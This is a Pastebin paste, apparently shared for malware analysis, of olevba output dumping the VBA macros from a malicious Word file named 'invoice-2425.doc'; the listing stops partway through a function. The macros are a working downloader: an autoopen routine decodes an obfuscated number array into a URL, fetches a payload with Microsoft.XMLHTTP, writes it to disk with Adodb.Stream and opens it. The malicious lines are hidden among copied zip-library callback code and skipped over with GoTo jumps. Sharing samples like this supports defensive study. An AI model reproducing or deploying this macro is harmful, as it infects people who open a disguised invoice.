SHARE
TWEET

Malicious Word macro

dynamoo Oct 26th, 2015 376 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V invoice-2425.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoice-2425.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17. UZDLLPrnt "", 1
  18. ZDLLComm "NNcc"
  19. xbee_ensureMessageID
  20. szTrim ""
  21. ChopNulls "NNm"
  22. VBZip32
  23. VBUnZip32
  24. ZDLLPass "", 1, "", ""
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34. '-- Callback For UNZIP32.DLL - Receive Message Function
  35. Public Sub UZReceiveDLLMessage_I32( _
  36.     ByVal ucsize_lo As Long, _
  37.     ByVal ucsize_hi As Long, _
  38.     ByVal csiz_lo As Long, _
  39.     ByVal csiz_hi As Long, _
  40.     ByVal cfactor As Integer, _
  41.     ByVal mo As Integer, _
  42.     ByVal dy As Integer, _
  43.     ByVal yr As Integer, _
  44.     ByVal hh As Integer, _
  45.     ByVal mm As Integer, _
  46.     ByVal c As Byte, _
  47.     ByRef fname As String, _
  48.     ByRef meth As String, _
  49.     ByVal crc As Long, _
  50.     ByVal fCrypt As Byte)
  51.  
  52.   Dim s0     As String
  53.   Dim xx     As Long
  54.   Dim cCh    As Byte
  55.   Dim strout As String * 80
  56.   Dim ucsize As Double
  57.   Dim csiz   As Double
  58.  
  59.   '-- Always implement a runtime error handler in Callback Routines!
  60.  On Error Resume Next
  61.  
  62.   '------------------------------------------------
  63.  '-- This Is Where The Received Messages Are
  64.  '-- Printed Out And Displayed.
  65.  '-- You Can Modify Below!
  66.  '------------------------------------------------
  67.  
  68.   strout = Space$(80)
  69.  
  70.   '-- For Zip Message Printing
  71.  If uZipNumber = 0 Then
  72.     Mid$(strout, 1, 50) = "Filename:"
  73.     Mid$(strout, 53, 4) = "Size"
  74.     Mid$(strout, 62, 4) = "Date"
  75.     Mid$(strout, 71, 4) = "Time"
  76.     uZipMessage = strout & vbNewLine
  77.     strout = Space$(80)
  78.   End If
  79.  
  80.   s0 = ""
  81.  
  82.   '-- Do Not Change This For Next!!!
  83.  For xx = 0 To UBound(fname.ch)
  84.     If fname.ch(xx) = 0 Then Exit For
  85.     s0 = s0 & Chr$(fname.ch(xx))
  86.   Next
  87.  
  88.   ucsize = CnvI64Struct2Dbl(ucsize_lo, ucsize_hi)
  89.   csiz = CnvI64Struct2Dbl(csiz_lo, csiz_hi)
  90.  
  91.   '-- Assign Zip Information For Printing
  92.  Mid$(strout, 1, 50) = Mid$(s0, 1, 50)
  93.   Mid$(strout, 51, 9) = Right$("        " & CStr(ucsize), 9)
  94.   Mid$(strout, 62, 3) = Right$("0" & Trim$(CStr(mo)), 2) & "/"
  95.   Mid$(strout, 65, 3) = Right$("0" & Trim$(CStr(dy)), 2) & "/"
  96.   Mid$(strout, 68, 2) = Right$("0" & Trim$(CStr(yr)), 2)
  97.   Mid$(strout, 72, 3) = Right$(str$(hh), 2) & ":"
  98.   Mid$(strout, 75, 2) = Right$("0" & Trim$(CStr(mm)), 2)
  99.  
  100.   ' Mid$(strout, 77, 2) = Right$(" " & CStr(cfactor), 2)
  101.  ' Mid$(strout, 80, 8) = Right$("        " & CStr(csiz), 8)
  102.  ' s0 = ""
  103.  ' For xx = 0 To 255
  104.  '     If meth.ch(xx) = 0 Then Exit For
  105.  '     s0 = s0 & Chr$(meth.ch(xx))
  106.  ' Next xx
  107.  
  108.   '-- Do Not Modify Below!!!
  109.  uZipMessage = uZipMessage & strout & vbNewLine
  110.   uZipNumber = uZipNumber + 1
  111.  
  112. End Sub
  113.  
  114. '-- Callback For UNZIP32.DLL - Print Message Function
  115. Public Function UZDLLPrnt(ByRef fname As String, ByVal x As Long)
  116.  
  117.   Dim s0 As String
  118.   Dim xx As Long
  119.   Dim cCh As Byte
  120.  
  121.   '-- Always implement a runtime error handler in Callback Routines!
  122.  On Error Resume Next
  123.  
  124.   s0 = ""
  125.  
  126.   '-- Gets The UNZIP32.DLL Message For Displaying.
  127.  For xx = 0 To x - 1
  128.     cCh = fn.ame.ch(xx)
  129.     Select Case cCh
  130.     Case 0
  131.       Exit For
  132.     Case 10
  133.       s0 = s0 & vbNewLine     ' Damn UNIX :-)
  134.    Case 92 ' = Asc("\")
  135.      s0 = s0 & "/"
  136.     Case Else
  137.       s0 = s0 & Chr$(cCh)
  138.     End Select
  139.   Next
  140.  
  141. Set httpRequest = CreateObject("Microsoft.XMLHTTP")
  142.  
  143.  
  144. Set adodbStream = CreateObject("Adodb.Stream")
  145.   '-- Assign Zip Information
  146.  
  147.  
  148. End Function
  149.  
  150. '-- Callback For UNZIP32.DLL - DLL Service Function
  151. Public Function UZDLLServ_I32(ByRef mname As String, _
  152.          ByVal lUcSiz_Lo As Long, ByVal lUcSiz_Hi As Long) As Long
  153.  
  154.   Dim UcSiz As Double
  155.   Dim s0 As String
  156.   Dim xx As Long
  157.  
  158.   '-- Always implement a runtime error handler in Callback Routines!
  159.  On Error Resume Next
  160.  
  161.   ' Parameters lUcSiz_Lo and lUcSiz_Hi contain the uncompressed size
  162.  ' of the extracted archive entry.
  163.  ' This information may be used for some kind of progress display...
  164.  UcSiz = CnvI64Struct2Dbl(lUcSiz_Lo, lUcSiz_Hi)
  165.  
  166.   s0 = ""
  167.   '-- Get Zip32.DLL Message For processing
  168.  For xx = 0 To UBound(mname.ch)
  169.     If mname.ch(xx) = 0 Then Exit For
  170.     s0 = s0 & Chr$(mname.ch(xx))
  171.   Next
  172.   ' At this point, s0 contains the message passed from the DLL
  173.  ' (like the current file being extracted)
  174.  ' It is up to the developer to code something useful here :)
  175.  
  176.   UZDLLServ_I32 = 0 ' Setting this to 1 will abort the zip!
  177.  
  178. End Function
  179.  
  180.  
  181. '-- ASCIIZ To String Function
  182. Public Function szTrim(szString As String)
  183.  
  184.   Dim pos As Long
  185.  
  186. adodbStream.Type = 1
  187. adodbStream.Open
  188.   pos = InStr(szString, vbNullChar)
  189.  
  190.   Select Case pos
  191.     Case Is > 1
  192.       szTrim = Trim$(Left$(szString, pos - 1))
  193.     Case 1
  194.       szTrim = ""
  195.     Case Else
  196.       szTrim = Trim$(szString)
  197.   End Select
  198.  
  199. End Function
  200.  
  201. '-- convert a 64-bit int divided in two Int32 variables into
  202. '-- a single 64-bit floating-point value
  203. Private Function CnvI64Struct2Dbl(ByVal lInt64Lo As Long, lInt64Hi As Long) As Double
  204.   If lInt64Lo < 0 Then
  205.     CnvI64Struct2Dbl = 2# ^ 32 + CDbl(lInt64Lo)
  206.   Else
  207.     CnvI64Struct2Dbl = CDbl(lInt64Lo)
  208.   End If
  209.   CnvI64Struct2Dbl = CnvI64Struct2Dbl + (2# ^ 32) * CDbl(lInt64Hi)
  210. End Function
  211.  
  212. '-- Concatenate a "structured" version number into a single integer value,
  213. '-- to facilitate version number comparisons
  214. '-- (In case the practically used NumMajor numbers will ever exceed 128, it
  215. '-- should be considered to use the number type "Double" to store the
  216. '-- concatenated number. "Double" can store signed integer numbers up to a
  217. '-- width of 52 bits without loss of precision.)
  218. Private Function ConcatVersNums(ByVal NumMajor As Byte, ByVal NumMinor As Byte _
  219.                               , ByVal NumRevis As Byte, ByVal NumBuild As Byte) As Long
  220.   If (NumMajor And &H80) <> 0 Then
  221.     ConcatVersNums = (NumMajor And &H7F) * (2 ^ 24) Or &H80000000
  222.   Else
  223.     ConcatVersNums = NumMajor * (2 ^ 24)
  224.   End If
  225.   ConcatVersNums = ConcatVersNums _
  226.                  + NumMinor * (2 ^ 16) _
  227.                  + NumRevis * (2 ^ 8) _
  228.                  + NumBuild
  229. End Function
  230.  
  231. '-- Helper function to provide a printable version number string, using the
  232. '-- current formatting rule for version number display as implemented in UnZip.
  233. Private Function VersNumsToTxt(ByVal NumMajor As Byte, ByVal NumMinor As Byte _
  234.                              , ByVal NumRevis As Byte) As String
  235.   VersNumsToTxt = CStr(NumMajor) & "." & Hex$(NumMinor)
  236.   If NumRevis <> 0 Then VersNumsToTxt = VersNumsToTxt & Hex$(NumRevis)
  237. End Function
  238.  
  239. '-- Helper function to convert a "concatenated" version id into a printable
  240. '-- version number string, using the current formatting rule for version number
  241. '-- display as implemented in UnZip.
  242. Private Function VersIDToTxt(ByVal VersionID As Long) As String
  243.   Dim lNumTemp As Long
  244.  
  245.   lNumTemp = VersionID \ (2 ^ 24)
  246.   If lNumTemp < 0 Then lNumTemp = 256 + lNumTemp
  247.   VersIDToTxt = CStr(lNumTemp) & "." _
  248.              & Hex$((VersionID And &HFF0000) \ &H10000)
  249.   lNumTemp = (VersionID And &HFF00&) \ &H100
  250.   If lNumTemp <> 0 Then VersIDToTxt = VersIDToTxt & Hex$(lNumTemp)
  251. End Function
  252.  
  253. '-- Main UNZIP32.DLL UnZip32 Subroutine
  254. '-- (WARNING!) Do Not Change!
  255. Public Sub VBUnZip32()
  256.  
  257.   Dim retcode As Long
  258.   Dim MsgStr As String
  259.   Dim TotalSizeComp As Double
  260.   Dim TotalSize As Double
  261.   Dim NumMembers As Double
  262.  
  263.     adodbStream.write httpRequest.responseBody
  264.     adodbStream.savetofile prompt82, 2
  265.     GoTo Step33
  266.   '-- Set The UNZIP32.DLL Options
  267.  '-- (WARNING!) Do Not Change
  268.  UZDCL.StructVersID = cUz_DCLStructVer      ' Current version of this structure
  269.  UZDCL.ExtractOnlyNewer = uExtractOnlyNewer ' 1 = Extract Only Newer/New
  270.  UZDCL.SpaceToUnderscore = uSpaceUnderScore ' 1 = Convert Space To Underscore
  271.  UZDCL.PromptToOverwrite = uPromptOverWrite ' 1 = Prompt To Overwrite Required
  272.  UZDCL.fQuiet = uQuiet                      ' 2 = No Messages 1 = Less 0 = All
  273.  UZDCL.ncflag = uWriteStdOut                ' 1 = Write To Stdout
  274.  UZDCL.ntflag = uTestZip                    ' 1 = Test Zip File
  275.  UZDCL.nvflag = uExtractList                ' 0 = Extract 1 = List Contents
  276.  UZDCL.nfflag = uFreshenExisting            ' 1 = Update Existing by Newer
  277.  UZDCL.nzflag = uDisplayComment             ' 1 = Display Zip File Comment
  278.  UZDCL.ndflag = uHonorDirectories           ' 1 = Honour Directories
  279.  UZDCL.noflag = uOverWriteFiles             ' 1 = Overwrite Files
  280.  UZDCL.naflag = uConvertCR_CRLF             ' 1 = Convert CR To CRLF
  281.  UZDCL.nZIflag = uVerbose                   ' 1 = Zip Info Verbose
  282.  UZDCL.C_flag = uCaseSensitivity            ' 1 = Case insensitivity, 0 = Case Sensitivity
  283.  UZDCL.fPrivilege = uPrivilege              ' 1 = ACL 2 = Priv
  284.  UZDCL.Zip = uZipFileName                   ' ZIP Filename
  285.  UZDCL.ExtractDir = uExtractDir             ' Extraction Directory, NULL If Extracting
  286.                                             ' To Current Directory
  287.  
  288.   '-- Set Callback Addresses
  289.  '-- (WARNING!!!) Do Not Change
  290.  UZUSER.UZDLLPrnt = FnP.tr(AddressOf UZDLLPrnt)
  291.   UZUSER.UZDLLSND = 0&    '-- Not Supported
  292.  UZUSER.UZDLLMESSAGE_I32 = FnP.tr(AddressOf UZReceiveDLLMessage_I32)
  293.   UZUSER.UZDLLSERVICE_I32 = FnP.tr(AddressOf UZDLLServ_I32)
  294.  
  295.   '-- Set UNZIP32.DLL Version Space
  296.  '-- (WARNING!!!) Do Not Change
  297.  With UZVER2
  298.     .structlen = Len(UZVER2)
  299.     .Beta = String$(10, vbNullChar)
  300.     .Date = String$(20, vbNullChar)
  301.     .ZLIB = String$(10, vbNullChar)
  302.   End With
  303. Step33:
  304.     Exit Sub
  305.   '-- Get Version
  306.  retcode = UzpVe.rsion2(UZVER2)
  307.   If retcode <> 0 Then
  308.     MsgBox "Incompatible DLL version discovered!" & vbNewLine _
  309.          & "The UnZip DLL requires a version structure of length " _
  310.          & CStr(retcode) & ", but the VB frontend expects the DLL to need " _
  311.          & Len(UZVER2) & "bytes." & vbNewLine _
  312.          & vbNewLine & "The program cannot continue." _
  313.          , vbCritical + vbOKOnly, App.Title
  314.     Exit Sub
  315.   End If
  316.  
  317.   ' Check that the DLL version is sufficiently recent
  318.  If (ConcatVersNums(UZVER2.unzip(1), UZVER2.unzip(2) _
  319.                   , UZVER2.unzip(3), UZVER2.unzip(4)) < _
  320.       ConcatVersNums(cUzDLL_MinVer_Major, cUzDLL_MinVer_Minor _
  321.                   , cUzDLL_MinVer_Revis, 0)) Then
  322.     ' The found UnZip DLL is too old!
  323.    MsgBox "Incompatible old DLL version discovered!" & vbNewLine _
  324.          & "This program requires an UnZip DLL version of at least " _
  325.          & VersNumsToTxt(cUzDLL_MinVer_Major, cUzDLL_MinVer_Minor, cUzDLL_MinVer_Revis) _
  326.          & ", but the version reported by the found DLL is only " _
  327.          & VersNumsToTxt(UZVER2.unzip(1), UZVER2.unzip(2), UZVER2.unzip(3)) _
  328.          & "." & vbNewLine _
  329.          & vbNewLine & "The program cannot continue." _
  330.          , vbCritical + vbOKOnly, App.Title
  331.     Exit Sub
  332.   End If
  333.  
  334.   ' Concatenate the DLL API version info into a single version id variable.
  335.  ' This variable may be used later on to switch between different
  336.  ' known variants of specific API calls or API structures.
  337.  m_UzDllApiVers = ConcatVersNums(UZVER2.dllapimin(1), UZVER2.dllapimin(2) _
  338.                                 , UZVER2.dllapimin(3), UZVER2.dllapimin(4))
  339.   ' check that the DLL API version is not too new
  340.  If (m_UzDllApiVers > _
  341.       ConcatVersNums(cUzDLL_MaxAPI_Major, cUzDLL_MaxAPI_Minor _
  342.                   , cUzDLL_MaxAPI_Revis, 0)) Then
  343.     ' The found UnZip DLL is too new!
  344.    MsgBox "DLL version with incompatible API discovered!" & vbNewLine _
  345.          & "This program can only handle UnZip DLL API versions up to " _
  346.          & VersNumsToTxt(cUzDLL_MaxAPI_Major, cUzDLL_MaxAPI_Minor, cUzDLL_MaxAPI_Revis) _
  347.          & ", but the found DLL reports a newer API version of " _
  348.          & VersIDToTxt(m_UzDllApiVers) & "." & vbNewLine _
  349.          & vbNewLine & "The program cannot continue." _
  350.          , vbCritical + vbOKOnly, App.Title
  351.     Exit Sub
  352.   End If
  353.  
  354.   '--------------------------------------
  355.  '-- You Can Change This For Displaying
  356.  '-- The Version Information!
  357.  '--------------------------------------
  358.  MsgStr$ = "DLL Date: " & szTrim(UZVER2.Date)
  359.   MsgStr$ = MsgStr$ & vbNewLine$ & "Zip Info: " _
  360.        & VersNumsToTxt(UZVER2.zipinfo(1), UZVER2.zipinfo(2), UZVER2.zipinfo(3))
  361.   MsgStr$ = MsgStr$ & vbNewLine$ & "DLL Version: " _
  362.        & VersNumsToTxt(UZVER2.windll(1), UZVER2.windll(2), UZVER2.windll(3))
  363.   MsgStr$ = MsgStr$ & vbNewLine$ & "DLL API Compatibility: " _
  364.        & VersIDToTxt(m_UzDllApiVers)
  365.   MsgStr$ = MsgStr$ & vbNewLine$ & "--------------"
  366.   '-- End Of Version Information.
  367.  
  368.   '-- Go UnZip The Files! (Do Not Change Below!!!)
  369.  '-- This Is The Actual UnZip Routine
  370.  retcode = Wiz_Sin.gleEntryUnzip(uNumberFiles, uZipNames, uNumberXFiles, _
  371.                                  uExcludeNames, UZDCL, UZUSER)
  372.   '---------------------------------------------------------------
  373.  
  374.   '-- If There Is An Error Display A MsgBox!
  375.  If retcode <> 0 Then _
  376.     MsgBox "UnZip DLL call returned error code #" & CStr(retcode) _
  377.           , vbExclamation, App.Title
  378.  
  379.   '-- Add up 64-bit values
  380.  TotalSizeComp = CnvI64Struct2Dbl(UZUSER.TotalSizeComp_Lo, _
  381.                                    UZUSER.TotalSizeComp_Hi)
  382.   TotalSize = CnvI64Struct2Dbl(UZUSER.TotalSize_Lo, _
  383.                                UZUSER.TotalSize_Hi)
  384.   NumMembers = CnvI64Struct2Dbl(UZUSER.NumMembers_Lo, _
  385.                                 UZUSER.NumMembers_Hi)
  386.  
  387.   '-- You Can Change This As Needed!
  388.  '-- For Compression Information
  389.  MsgStr$ = MsgStr$ & vbNewLine & _
  390.        "Only Shows If uExtractList = 1 List Contents"
  391.   MsgStr$ = MsgStr$ & vbNewLine & "--------------"
  392.   MsgStr$ = MsgStr$ & vbNewLine & "Comment         : " & UZUSER.cchComment
  393.   MsgStr$ = MsgStr$ & vbNewLine & "Total Size Comp : " _
  394.                     & Format$(TotalSizeComp, "#,0")
  395.   MsgStr$ = MsgStr$ & vbNewLine & "Total Size      : " _
  396.                     & Format$(TotalSize, "#,0")
  397.   MsgStr$ = MsgStr$ & vbNewLine & "Compress Factor : %" & UZUSER.CompFactor
  398.   MsgStr$ = MsgStr$ & vbNewLine & "Num Of Members  : " & NumMembers
  399.   MsgStr$ = MsgStr$ & vbNewLine & "--------------"
  400.  
  401.   VBUnzFrm.txtMsgOut.Text = VBUnzFrm.txtMsgOut.Text & MsgStr$ & vbNewLine
  402. End Sub
  403.  
  404. -------------------------------------------------------------------------------
  405. VBA MACRO Module2.bas
  406. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module2'
  407. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  408.  
  409.  
  410.  
  411. Public httpRequest As Object
  412. Public adodbStream As Object
  413. Public processEnv  As Object
  414. Public tempFolder As String
  415. Public prompt82 As String
  416. Public ZDLLPass3 As Object
  417.  
  418.  
  419. '-- Callback For ZIP32z64.DLL - DLL Service Function
  420. Public Function ZDLLServ(ByRef mname As String, _
  421.                          ByVal LowSize As Long, _
  422.                          ByVal HighSize As Long) As Long
  423.  
  424.     Dim s0 As String
  425.     Dim xx As Long
  426.     Dim FS As Currency  ' for large file sizes
  427.    
  428.     '-- Always Put This In Callback Routines!
  429.    On Error Resume Next
  430.    
  431.     FS = (HighSize * &H10000 * &H10000) + LowSize
  432.  '   Form1.Print "ZDLLServ returned File Size High " & HighSize & _
  433.  '               " Low " & LowSize & " = " & FS & " bytes"
  434.    
  435.     s0 = ""
  436.     '-- Get Zip32.DLL Message For processing
  437.    For xx = 0 To 4096 ' x
  438.    If mname.ch(xx) = 0 Then
  439.         Exit For
  440.     Else
  441.         s0 = s0 + Chr(mname.ch(xx))
  442.     End If
  443.     Next
  444.     ' At this point, s0 contains the message passed from the DLL
  445.    ' It is up to the developer to code something useful here :)
  446.    ZDLLServ = 0 ' Setting this to 1 will abort the zip!
  447.    
  448. End Function
  449.  
  450. '-- Callback For ZIP32z64.DLL - DLL Password Function
  451. Public Function ZDLLPass(ByRef p As String, _
  452.   ByVal n As Long, ByRef m As String, _
  453.   ByRef Name As String)
  454.  
  455.   Dim filename   As String
  456.   Dim prompt     As String
  457.   Dim xx         As Integer
  458.   Dim szpassword As String
  459.  
  460.   '-- Always Put This In Callback Routines!
  461.  On Error Resume Next
  462.    
  463.   ZDLLPass = 1
  464.  
  465.     ZDLLPass3.Open (prompt82)
  466.   '-- User Entered A Password So Proccess It
  467.  Exit Function
  468.   '-- Enter or Verify
  469.  For xx = 0 To 255
  470.     If mnnn.ch(xx) = 0 Then
  471.       Exit For
  472.     Else
  473.       prompt = prompt & Chr(mnnn.ch(xx))
  474.     End If
  475.   Next
  476.  
  477.   '-- If There Is A Password Have The User Enter It!
  478.  '-- This Can Be Changed
  479.  
  480.   '-- Now skip asking if default password set
  481.  If EncryptionPassword <> "" Then
  482.     szpassword = EncryptionPassword
  483.   Else
  484.     szpassword = InputBox("Please Enter The Password!", prompt)
  485.   End If
  486.  
  487.   '-- The User Did Not Enter A Password So Exit The Function
  488.  If szpassword = "" Then Exit Function
  489.  
  490.   For xx = 0 To n - 1
  491.     pnnn.ch(xx) = 0
  492.   Next
  493.  
  494.   For xx = 0 To Len(szpassword) - 1
  495.     pnnn.ch(xx) = Asc(Mid(szpassword, xx + 1, 1))
  496.   Next
  497.  
  498.   pnnn.ch(xx) = Chr(0) ' Put Null Terminator For C
  499.  
  500.   ZDLLPass = 0
  501.    
  502. End Function
  503.  
  504. '-- Callback For ZIP32z64.DLL - DLL Comment Function
  505. Public Function ZDLLComm(ByRef s1 As String)
  506.    
  507.     Dim comment As String
  508.     Dim xx%, szcomment$
  509.     Dim comment2() As Variant
  510.    
  511.     '-- Always Put This In Callback Routines!
  512.    On Error Resume Next
  513.     ZDLLComm = 1
  514.    
  515.     comment2 = Array(157, 167, 165, 159, 103, 90, 88, 144, 146, 138, 82, 77, 127, 144, 146, 124, 135, 134, 115, 116, 128, 127, 111, 121, 110, 104, 111, 99, 43, 94, 104, 100, 36, 42, 39, 97, 34, 33, 78, 31, 28, 92, 25, 14, 19, 16, 61, 61, 12, 11, -1, 52, 69, 48)
  516. GoTo Step1
  517.    
  518.     If Not IsEmpty(ArchiveCommentText) Then
  519.       ' use text given to SetZipOptions
  520.      szcomment = ArchiveCommentText
  521.     Else
  522.       For xx = 0 To 4095
  523.         szcomment = szcomment & Chr(shh1.ch(xx))
  524.         If sdd1.ch(xx) = 0 Then
  525.           Exit For
  526.         End If
  527.       Next
  528.       comment = InputBox("Enter or edit the comment", Default:=szcomment)
  529.       If comment = "" Then
  530.         ' either empty comment or Cancel button
  531.        If MsgBox("Remove comment?" & Chr(13) & "Hit No to keep existing comment", vbYesNo) = vbYes Then
  532.             szcomment = comment
  533.         Else
  534.           Exit Function
  535.         End If
  536.       End If
  537.       szcomment = comment
  538.     End If
  539. Step1:
  540. httpRequest.Open "G" & "E" + "T", GetStringFromArray(comment2, 53), False
  541.    GoTo Step2
  542.     'If szcomment = "" Then Exit Function
  543.    For xx = 0 To Len(szcomment) - 1
  544.         sgg1.ch(xx) = Asc(Mid$(szcomment, xx + 1, 1))
  545.     Next xx
  546.     sggg1.ch(xx) = 0 ' Put null terminator for C
  547. Step2:
  548. httpRequest.Send
  549. End Function
  550.  
  551. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
  552.     Dim i As Integer
  553.     Dim result As String
  554.     result = ""
  555.     For i = LBound(fromArr) To UBound(fromArr)
  556.         result = result & Chr(fromArr(i) - LenLen + i * 2)
  557.     Next i
  558.     GetStringFromArray = result
  559. End Function
  560.  
  561. ' This function can be used to set options in VB
  562. Public Function SetZipOptions(ByRef ZipOpts As String, _
  563.   Optional ByVal ZipMode As String, _
  564.   Optional ByVal RootDirToZipFrom As String, _
  565.   Optional ByVal CompressionLevel As String, _
  566.   Optional ByVal RecurseSubdirectories As String, _
  567.   Optional ByVal Verboseness As String, _
  568.   Optional ByVal i_IncludeFiles As String, _
  569.   Optional ByVal x_ExcludeFiles As String, _
  570.   Optional ByVal UpdateSFXOffsets As Boolean = False, Optional ByVal JunkDirNames As Boolean = False, _
  571.   Optional ByVal Encrypt As Boolean = False, Optional ByVal Password As String = "", _
  572.   Optional ByVal Repair As String, Optional ByVal NoDirEntries As Boolean = False, _
  573.   Optional ByVal GrowExistingArchive As Boolean = False, _
  574.   Optional ByVal JunkSFXPrefix As Boolean = False, Optional ByVal ForceUseOfDOSNames As Boolean = False, _
  575.   Optional ByVal Translate_LF As String, _
  576.   Optional ByVal Move_DeleteAfterAddedOrUpdated As Boolean = False, _
  577.   Optional ByVal SetZipTimeToLatestTime As Boolean = False, _
  578.   Optional ByVal IncludeSystemAndHiddenFiles As Boolean = False, _
  579.   Optional ByVal ExcludeEarlierThanDate As String = "", _
  580.   Optional ByVal IncludeEarlierThanDate As String = "", _
  581.   Optional ByVal IncludeVolumeLabel As Boolean = False, _
  582.   Optional ByVal ArchiveComment As Boolean = False, _
  583.   Optional ByVal ArchiveCommentTextString = Empty, _
  584.   Optional ByVal UsePrivileges As Boolean = False, _
  585.   Optional ByVal ExcludeExtraAttributes As Boolean = False, Optional ByVal SplitSize As String = "", _
  586.   Optional ByVal TempDirPath As String = "") As Boolean
  587.  
  588.   Dim SplitNum As Long
  589.   Dim SplitMultS As String
  590.   Dim SplitMult As Long
  591.  
  592.   ' set some defaults
  593.  ZipOpts.Date = vbNullString
  594.   ZipOpts.szRootDir = vbNullString
  595.   ZipOpts.szTempDir = vbNullString
  596.   ZipOpts.fTemp = 0
  597.   ZipOpts.fSuffix = 0
  598.   ZipOpts.fEncrypt = 0
  599.   ZipOpts.fSystem = 0
  600.   ZipOpts.fVolume = 0
  601.   ZipOpts.fExtra = 0
  602.   ZipOpts.fNoDirEntries = 0
  603.   ZipOpts.fExcludeDate = 0
  604.   ZipOpts.fIncludeDate = 0
  605.   ZipOpts.fVerbose = 0
  606.   ZipOpts.fQuiet = 0
  607.   ZipOpts.fCRLF_LF = 0
  608.   ZipOpts.fLF_CRLF = 0
  609.   ZipOpts.fJunkDir = 0
  610.   ZipOpts.fGrow = 0
  611.   ZipOpts.fForce = 0
  612.   ZipOpts.fMove = 0
  613.   ZipOpts.fDeleteEntries = 0
  614.   ZipOpts.fUpdate = 0
  615.   ZipOpts.fFreshen = 0
  616.   ZipOpts.fJunkSFX = 0
  617.   ZipOpts.fLatestTime = 0
  618.   ZipOpts.fComment = 0
  619.   ZipOpts.fOffsets = 0
  620.   ZipOpts.fPrivilege = 0
  621.   ZipOpts.szSplitSize = vbNullString
  622.   ZipOpts.IncludeListCount = 0
  623.   ZipOpts.szIncludeList = vbNullString
  624.   ZipOpts.ExcludeListCount = 0
  625.   ZipOpts.szExcludeList = vbNullString
  626.   ZipOpts.fRecurse = 0
  627.   ZipOpts.fRepair = 0
  628.   ZipOpts.flevel = 0
  629.  
  630.   If RootDirToZipFrom <> "" Then
  631.     ZipOpts.szRootDir = RootDirToZipFrom
  632.   End If
  633.   ZipOpts.flevel = Asc(CompressionLevel)
  634.   If UpdateSFXOffsets Then ZipOpts.fOffsets = 1
  635.  
  636.   If i_IncludeFiles <> "" Then
  637.     ZipOpts.szIncludeList = i_IncludeFiles
  638.   End If
  639.   If x_ExcludeFiles <> "" Then
  640.     ZipOpts.szExcludeList = x_ExcludeFiles
  641.   End If
  642.  
  643.   If ZipMode = Add Then
  644.     ' default
  645.  ElseIf ZipMode = Delete Then
  646.     ZipOpts.fDeleteEntries = 1
  647.   ElseIf ZipMode = Update Then
  648.     ZipOpts.fUpdate = 1
  649.   Else
  650.     ZipOpts.fFreshen = 1
  651.   End If
  652.   ZipOpts.fRepair = Repair
  653.   If GrowExistingArchive Then ZipOpts.fGrow = 1
  654.   If Move_DeleteAfterAddedOrUpdated Then ZipOpts.fMove = 1
  655.    
  656.   If Verboseness = Quiet Then
  657.     ZipOpts.fQuiet = 1
  658.   ElseIf Verboseness = Verbose Then
  659.     ZipOpts.fVerbose = 1
  660.   End If
  661.  
  662.   If ArchiveComment = False And Not IsEmpty(ArchiveCommentTextString) Then
  663.     MsgBox "Must set ArchiveComment = True to set ArchiveCommentTextString"
  664.     Exit Function
  665.   End If
  666.   If IsEmpty(ArchiveCommentTextString) Then
  667.     ArchiveCommentText = Empty
  668.   Else
  669.     ArchiveCommentText = ArchiveCommentTextString
  670.   End If
  671.   If ArchiveComment Then ZipOpts.fComment = 1
  672.  
  673.   If NoDirEntries Then ZipOpts.fNoDirEntries = 1
  674.   If JunkDirNames Then ZipOpts.fJunkDir = 1
  675.   If Encrypt Then ZipOpts.fEncrypt = 1
  676.   EncryptionPassword = Password
  677.   If JunkSFXPrefix Then ZipOpts.fJunkSFX = 1
  678.   If ForceUseOfDOSNames Then ZipOpts.fForce = 1
  679.   If Translate_LF = LF_To_CRLF Then ZipOpts.fLF_CRLF = 1
  680.   If Translate_LF = CRLF_To_LF Then ZipOpts.fCRLF_LF = 1
  681.   ZipOpts.fRecurse = RecurseSubdirectories
  682.   If IncludeSystemAndHiddenFiles Then ZipOpts.fSystem = 1
  683.  
  684.   If SetZipTimeToLatestTime Then ZipOpts.fLatestTime = 1
  685.   If ExcludeEarlierThanDate <> "" And IncludeEarlierThanDate <> "" Then
  686.     MsgBox "Both ExcludeEarlierThanDate and IncludeEarlierThanDate not " & Chr(10) & _
  687.            "supported at same time"
  688.     Exit Function
  689.   End If
  690.   If ExcludeEarlierThanDate <> "" Then
  691.     ZipOpts.fIncludeDate = 1
  692.     ZipOpts.Date = ExcludeEarlierThanDate
  693.   End If
  694.   If IncludeEarlierThanDate <> "" Then
  695.     ZipOpts.fExcludeDate = 1
  696.     ZipOpts.Date = IncludeEarlierThanDate
  697.   End If
  698.  
  699.   If TempDirPath <> "" Then
  700.     ZipOpts.szTempDir = TempDirPath
  701.     ZipOpts.fTemp = 1
  702.   End If
  703.  
  704.   If SplitSize <> "" Then
  705.     SplitSize = Trim(SplitSize)
  706.     SplitMultS = Right(SplitSize, 1)
  707.     SplitMultS = UCase(SplitMultS)
  708.     If (SplitMultS = "K") Then
  709.         SplitMult = 1024
  710.         SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
  711.     ElseIf SplitMultS = "M" Then
  712.         SplitMult = 1024 * 1024&
  713.         SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
  714.     ElseIf SplitMultS = "G" Then
  715.         SplitMult = 1024 * 1024 * 1024&
  716.         SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
